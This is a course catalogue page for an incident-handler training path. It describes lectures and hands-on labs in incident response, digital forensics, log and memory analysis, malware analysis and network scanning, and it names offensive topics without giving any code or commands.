Become an Incident Handler

Overview
You will learn the incident response process, from building an incident response kit and developing an incident response team, to identifying, containing, and recovering from incidents. We then steer away from a traditional “defensive-only” approach to introduce you to the attacker’s world, covering basic information on reconnaissance, scanning and enumeration, attacks and maintaining persistence, evading antivirus, and maintaining stealth.
Dave starts by walking you through pre-incident planning and developing an incident response team. He then walks you through the management of incidents, including identification, containment, and eradication. You then learn proper methods for recovering from incidents, and spend some time in hands-on labs getting familiar with incident response and digital forensic techniques. You will then get an introduction to the Mitre Att&ck Framework, including a deep dive into Threat Intelligence. Continuing the journey on the offensive side of things, you learn about scanning with NMAP and get some hands-on experience in a lab. You then learn about different attack types, ways to maintain persistence, evasion techniques, and how to be stealthier using techniques like Ghostwriting. The path wraps up with an overview of forensic tools.
How Long Will It Take To Be Job Ready?

DFIR Investigations and Witness Testimony

Analyzing Attacks for Incident Handlers

Online Reconnaissance

Scanning and Enumeration with NMAP

MITRE ATT&CK Defender™ (MAD) ATT&CK® Cyber Threat Intelligence Certification Training

Evasion for Incident Handlers

Stealth Techniques for Incident Handlers

Finding Malicious Indicators Lab
In this lab, you will get an opportunity to examine a system that was and is still actively compromised by an attacker. You have likely read articles in the news or heard from your professors about some of the various high-profile attacks where large companies had systems compromised. It is important to be able to look at a system and know how to examine it in order to determine if the system has been compromised. There are utilities that are built into the operating system as well as third-party utilities that can be utilized to help you determine if a system is compromised. Some of the common tasks that be performed to check for a system compromise include examining network connections, file time stamps, viewing the registry, and dumping and examining the RAM of the system. This lab will help you learn about the possible indications of a compromised system.

Log Analysis Lab
This lab is part of a series of lab exercises intended to support courseware for Forensics training. The development of this document is funded by the Department of Labor (DOL) Trade Adjustment Assistance Community College and Career Training (TAACCCT) Grant No. TC-22525-11-60-A-48. In this lab, students will enumerate hosts on the network using various tools. This lab includes the following tasks: Examining Windows Event Logs Examining Windows IIS Logs Examining Linux Log Files

Log Correlation & Analysis to Identify Potential IOC
When defending networked digital systems, attention must be paid to the logging mechanisms set in place to detect suspicious behavior. In this lab, students will work with Splunk to help correlate server logs, system logs, and application logs in order to determine if an attacker was successful, and if so what happened and how they got in.

Performing Incident Response in a Windows Environment
Take on the role of the lead incident responder on a sysadmin team, and use incident response methodologies to: determine what happened, identify any malicious files found on the system, take the appropriate steps to resolve any discovered issues, and investigate critical system modifications to determine if a virus was installed on the machine.

Forensic Analysis of a Linux System Lab
In this lab, you will learn how to search through a forensic disk image in dd format to find artifacts related to an intrusion on a Linux Server. Some of the relevant forensic artifacts from a Linux system include apache log files, the history file, and the secure or auth.log file, which includes valuable information such as SSH connections or user account activity. You will find that forensic analysis of a Linux system is far different than forensics in Windows.

Forensic Analysis of a Windows 10 Client Lab
In this lab, you will learn how to search through a forensic disk image in dd format to find artifacts related to an intrusion on a Windows client machine. Windows’ client machines tend to be a large target for hackers because end users, who may lack knowledge of computer security, can download malicious files or open malicious attachments. Some of the relevant forensic artifacts from a Windows server include Windows event log files, event viewer files, and registry entries.

Forensic Analysis of Windows Server Lab
In this lab, you will learn how to search through a forensic disk image in dd format to find artifacts related to an intrusion on a Windows Server. A hacker’s dream is to compromise a Windows Server, especially a domain controller, because they can leverage the Domain administrator account to control most of the other systems within in the network. The relevant forensic artifacts from a Windows Server include log files, event viewer files, and registry entries.

Memory Analysis Lab
This lab is part of a series of lab exercises designed through a grant initiative by the Center for Systems Security and Information Assurance (CSSIA) and the Network Development Group (NDG) and funded by the National Science Foundation’s (NSF) Advanced Technological Education (ATE) program Department of Undergraduate Education (DUE) Award No. 0702872 and 1002746. By the end of this lab, students will utilize various methods to determine if an attacker attempted a breach or successfully compromised a system. Some information about the attacker, such as his IP Address, may be lost if the machine is shutdown. For this reason, an investigator collects volatile data before shutting down a system. This lab includes the following tasks: Task 1 – Obtaining a dump of physical memory using DumpIt Task 2 – Attacking the victim system with Armitage Task 3 – Using volatility to determine remote connections

Static and Dynamic Malware Analysis Lab
In this lab, students will perform static and dynamic malware analysis. Analyzing malware is important for many reasons. Malware analysis in general is taking steps to find out more information about things like who crafted a malware payload or what types of actions the malware is trying to perform. Static analysis is where you look at the file contents and look at the strings and don’t execute the file. With dynamic malware analysis, you run the file (likely in a virtual environment not connected to a real network) to see the types of network and process actions that happen to the system.

Open Source Collection
The Open Source Collection lab is designed to familiarize students with the advanced functionality of Google, default webpages used for web-servers, and the specifics of Google Hacking database. This allows the students to understand how open source information can be used for exploitation purposes.

Scanning and Mapping Networks
Students will use Zenmap to scan a network segment in order to create an updated network map and detail findings on the systems discovered. They will use the material they generated to help them discover if there have been any changes to the network after they compare it to a previously generated network map/scan.

Introduction to Single Purpose Forensic Tools Lab
This lab is part of a series of lab exercises intended to support courseware for Forensics training. The development of this document is funded by the Department of Labor (DOL) Trade Adjustment Assistance Community College and Career Training (TAACCCT) Grant No. TC-22525-11-60-A-48. In this lab, students will enumerate hosts on the network using various tools. This lab includes the following tasks: Using file hashing tools to verify integrity Mounting a partition with deleted files and folders Using Foremost to carve files Using a HEX editor